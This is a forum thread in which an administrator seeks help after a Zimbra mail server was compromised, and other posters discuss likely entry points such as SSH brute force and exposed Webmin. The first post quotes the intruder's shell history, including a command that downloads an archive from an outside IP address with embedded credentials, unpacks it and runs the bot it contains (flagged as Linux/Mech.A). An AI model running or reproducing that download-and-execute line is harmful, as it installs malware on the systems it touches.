Zimbra Server compromised

[sem]

Hi - a zimbra box I keep an eye on was compromised on 12/7 - I noticed I stopped receiving automated emails from the backup script.

This was in the .bash_history

id
uname -a
ls -a
cat .bash_history
cd /tmp
ls -a
wget eff-tee-pee://user:123456@65.38.182.79/autorun.tgz;tar[/url] -xzvf autorun.tgz;rm -rf autorun.tgz;cd .m;cd conect3;chmod +x *;./start lfg
cd ..
ls -a
cd ..
rm -rf .m
ps x
kill -9 12150
exit

So the zmback cron was removed. It's an ubuntu 8.04 server, kept up to date with apt. Apart from zimbra, the only other thing installed is Webmin which is locked down to being only available to 2 IP addresses. The router only has open ports for the essential zimbra services (secure imap, ssl smpt etc).

Any advice please? My desktop AVG reports the file as being infected with Linux/Mech.A -

I've altered the URL shown to as to stop people clicking on it.

sem

[Dirk]

Can you rule out physical access?

[sem]

Quote:

Originally Posted by Dirk

Can you rule out physical access?

Not 100% to be honest. The server is in a server room that is normally locked. I'm the only one that knows the root password.

Up until this morning, other than the afforementioned zimbra ports and ssh, only webmin was available - I've since closed these ports off too.

[dave_kempe]

odds on, you had a weak password on an account and it was a simple brute force ssh attack.

[Dirk]

Are there any signs of bruteforcing the ssh password?
Working out how the attack was performed is hard unless you have experience of this in the past, I'd lean towards thinking that it's not Zimbra itself that's been breached though.

I'm not aware of any remote exploit or attack that can be performed against ports 25,443 and 993 open to Zimbra.

[sem]

Quote:

Originally Posted by dave_kempe

odds on, you had a weak password on an account and it was a simple brute force ssh attack.

Unlikely - I'm not an expert but port 22 on the router is port forwarded to another linux machine - you then open an ssh session to the zimbra box. I've checked this one and it's not been compromised at all. that's the only ssh route to the zimbra box.

[sem]

Quote:

Originally Posted by Dirk

Are there any signs of bruteforcing the ssh password?
Working out how the attack was performed is hard unless you have experience of this in the past, I'd lean towards thinking that it's not Zimbra itself that's been breached though.

I'm not aware of any remote exploit or attack that can be performed against ports 25,443 and 993 open to Zimbra.

Not on the zimbra server - outside of the network, you can't directly ssh to it.

[LMStone]

Are you saying Webmin was exposed to the public Internet? That alone provides a pretty broad attack surface...

If you also had Webmin open on your Desktop and went to another web site with an infected ad, that could also be the attack vector. See Webmin for example.

If the root account on your Zimbra server has been compromised, just changing the root password is likely not sufficient for eliminating the exposure.

I'd strongly suggest engaging a professional security firm for an assessment.

Hope that helps,
Mark

[sem]

Quote:

Originally Posted by LMStone

Are you saying Webmin was exposed to the public Internet? That alone provides a pretty broad attack surface...

Hope that helps,
Mark

Hi - thanks for the advice. I've used webmin to varying extents for years - the version on the zimbra box is the latest. it's not really used and doesn't have 100% access from the Internet - it was also not operatiing on the standard webmin port.

i've disabled access to the root account and changed the password on the sole user account. I've checked again and the only thing compromised was the cron job - it looks like the virus was unable to propagate itself.

I'm getting someone to take a look at it tonight though.

[sem]

As an update I've shut off all access from the internet beyond what zimbra requires to handle mail. vigilance ensues.